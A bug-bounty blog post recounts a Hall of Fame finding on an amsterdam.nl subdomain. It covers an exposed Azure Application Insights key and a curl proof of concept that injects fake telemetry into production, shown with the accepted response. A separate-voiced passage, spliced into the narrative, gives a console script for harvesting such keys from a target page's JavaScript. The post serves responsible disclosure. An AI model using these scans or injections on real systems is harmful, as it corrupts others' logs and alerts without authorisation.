How I Pwned Telemetry on Amsterdam.nl: A Simple JS Scan Landed Me in Amsterdam's Hall of Fame (Swag Pending, Lol)

Yo, what's up peeps, it's MRKNIGHT-NIDU here! Today I'm spilling the tea on how I nabbed this high-sev find on a subdomain of amsterdam.nl, got into their Hall of Fame, and uh... still waiting on that swag. It's been a wild ride, but lemme break it down from the start.

The trigger: That lit LinkedIn post
It all popped off when I was doomscrolling on LinkedIn. Saw this post from a researcher who scored some dope swag and Hall of Fame vibes for reporting a bug to amsterdam.nl. I was like, "Bet, I want that too!" So I jumped into recon on amsterdam.nl domains. Who doesn't love a hunt with potential rewards, no cap?

I fired up my private tools to scoop up all the subdomains of amsterdam.nl. One by one, I checked 'em out, testing features and looking for sus stuff, but nada at first. Then I hit this interesting subdomain: https://don'tknow.amsterdam.nl/ (lol, the name's kinda funny now; I chose this placeholder name for privacy).
Didn't see much on the surface, so I dipped into the source code. In the browser console I checked all the JS files and ran a script to hunt for hidden API keys. Boom, yo, I got it: a straight-up exposed Instrumentation Key for Azure Application Insights. The key? fa239857–there-is-not-api-bf76-read-the-blog-bro! It was chilling in client-side JS, easy pickings.
Me to myself:
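Here is an added example of the kind of console script this step describes. It is my illustration, not the author's private tooling, and the sample bundle inside it is constructed (it is not code from amsterdam.nl). It scans JavaScript text for the two shapes an Application Insights credential takes in the browser: an instrumentationKey / iKey config value (a GUID) and a connection string that also carries the IngestionEndpoint the SDK will POST to. The real key in this write-up is redacted, so it would not match the GUID pattern; a live one would.

```javascript
// Added example: hunt Azure Application Insights credentials in JS bundle text.
// Not the author's tool; sample input below is constructed for the demo.

// An Application Insights instrumentation key is a GUID (8-4-4-4-12 hex).
const GUID = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}";

const PATTERNS = [
  // instrumentationKey: "guid"  /  "instrumentationKey":"guid"  /  iKey:'guid'
  {
    kind: "instrumentationKey",
    re: new RegExp(`\\b(?:instrumentationKey|iKey)["']?\\s*[:=]\\s*["'](${GUID})["']`, "gi"),
  },
  // Connection string: InstrumentationKey=guid;IngestionEndpoint=https://...;...
  // Capturing the whole string tells you which regional endpoint accepts the key.
  {
    kind: "connectionString",
    re: new RegExp(`InstrumentationKey=(${GUID})(?:;[A-Za-z]+=[^;"'\\s]+)*`, "gi"),
  },
];

// Scan one bundle's text; `origin` is just a label (URL or "<inline>") for the report.
function findAppInsightsKeys(source, origin = "<inline>") {
  const hits = [];
  for (const { kind, re } of PATTERNS) {
    re.lastIndex = 0; // the regexes are global and reused across calls
    let m;
    while ((m = re.exec(source)) !== null) {
      hits.push({ kind, key: m[1].toLowerCase(), match: m[0], origin });
    }
  }
  return hits;
}

// One key referenced from five chunks should be reported once.
function uniqueKeys(hits) {
  return [...new Set(hits.map((h) => h.key))];
}

// Browser usage (paste into the DevTools console on the target page):
//   const urls = [...document.scripts].map(s => s.src).filter(Boolean);
//   for (const u of urls) fetch(u).then(r => r.text()).then(t => console.table(findAppInsightsKeys(t, u)));
//   [...document.scripts].filter(s => !s.src).forEach(s => console.table(findAppInsightsKeys(s.textContent)));

// Constructed sample bundle (hypothetical GUID, not a real resource).
const SAMPLE_BUNDLE = `
var cfg={instrumentationKey:"12345678-abcd-4ef0-9abc-0123456789ab",samplingPercentage:100};
window.appInsights=new ApplicationInsights({config:{connectionString:"InstrumentationKey=12345678-ABCD-4EF0-9ABC-0123456789AB;IngestionEndpoint=https://westeurope-5.in.applicationinsights.azure.com/"}});
var notAKey="instrumentationKey: 'placeholder'";
`;

if (typeof require !== "undefined" && require.main === module) {
  const hits = findAppInsightsKeys(SAMPLE_BUNDLE, "sample.js");
  console.table(hits);
  console.log("unique keys:", uniqueKeys(hits));
}
```

The connection-string match is the more useful of the two: the `IngestionEndpoint` it carries is the host you POST telemetry to, so a hit there gives you both halves of a PoC without guessing the region.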

But, but, but: just finding a key? Nah, triage teams would close that as informative real quick. So I had to level up, exploit it, and show the impact.
Proving It: Whipping Up the PoC
With this key, anyone can inject fake telemetry into the app's Application Insights resource with zero authentication. That lets you:
Mess up logs and metrics
Trigger fake alerts, or bury real ones in noise
Junk up dashboards
Give red teams noise cover for the real activity
To show it, I made a simple curl PoC to shoot fake data into production (endpoint and key redacted):
# endpoint host and iKey below are redacted placeholders
curl -X POST "https://blah-blah-blah-5.in.yo-yo-yo-yo.azure.com/v2/track" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Microsoft.ApplicationInsights.Event",
    "time": "2025-07-02T12:34:56.789Z",
    "iKey": "fa239857-there-is-not-api-bf76-read-the-blog-bro",
    "data": {
      "baseType": "EventData",
      "baseData": {
        "name": "Test_Injection",
        "properties": {
          "environment": "production",
          "alert": "FAKE TELEMETRY INJECTED",
          "author": "MRKNIGHT-NIDU"
        }
      }
    }
  }'
Response came back like:
{"itemsReceived":1,"itemsAccepted":1,"appId":null,"errors":[]}

Yo, it worked: itemsAccepted:1 with an empty errors array means the ingestion endpoint ate my fake event, no questions asked.

This proved it's exploitable and hits data integrity hard.
Sev Level and Mapping
I called it HIGH sev:
Exposure: Prod key in JS, out in the open.
Auth: Zero, public POST go brr.
Impact: Wrecks logging, alerts, analytics.
Likelihood: Super high, browser inspect and done.
The closest OWASP Top 10 2021 buckets are A05:2021 Security Misconfiguration (a production ingestion key served to every browser) and A09:2021 Security Logging and Monitoring Failures (untrusted telemetry accepted straight into the log pipeline); A06:2021 Vulnerable and Outdated Components is a weaker fit, since nothing here is outdated. It's in the same family as CVE-2021-42306 (Azure credentials exposed where they shouldn't be, though that one was Azure AD application private keys leaking via keyCredentials, not App Insights) and the other App Insights key dramas.
One caveat worth stating plainly: the Application Insights JavaScript SDK needs the instrumentation key (or connection string) in the browser, so Microsoft documents the key as not a secret and the ingestion endpoint accepts unauthenticated POSTs by design. That's exactly why a bare key usually triages as informative, and why the PoC above is what carries the report. The Azure-side fix is to turn on Microsoft Entra ID authentication for ingestion and disable local authentication on the resource, after which telemetry carrying only the iKey is rejected; since the browser SDK can't do that for anonymous visitors, the practical pattern is to keep browser telemetry in its own resource, treat what it produces as untrusted, and never build alerting on it.
Reporting and the W
I put together a clean report with the PoC and sent it via their CVD program on Zerocopter on 02/07/2025. Two days later the team hit back: triaged as high, accepted! They added me to the Hall of Fame on the municipal infosec site (go check it). Policy says maybe a token of appreciation, so I'm hoping for Amsterdam swag.

Hall Of Fame: https://www.informatiebeveiligingsdienst.nl/responsible-disclosure/2025-coordinated-vulnerability-disclosure-hall-of-fame/

The Wait Game…
Now it's 28/11/2025, almost five months later, and I haven't got my swag yet. Lol, I'm about to cry, fr.

But the Hall of Fame is fire, and helping secure public stuff feels good. Bug hunting ain't just about rewards; it's the thrill and the impact.
Hope you vibe with my story! If you're hunting, drop your tales below. Amsterdam team, if you see this, swag pls?

Stay safe out there!
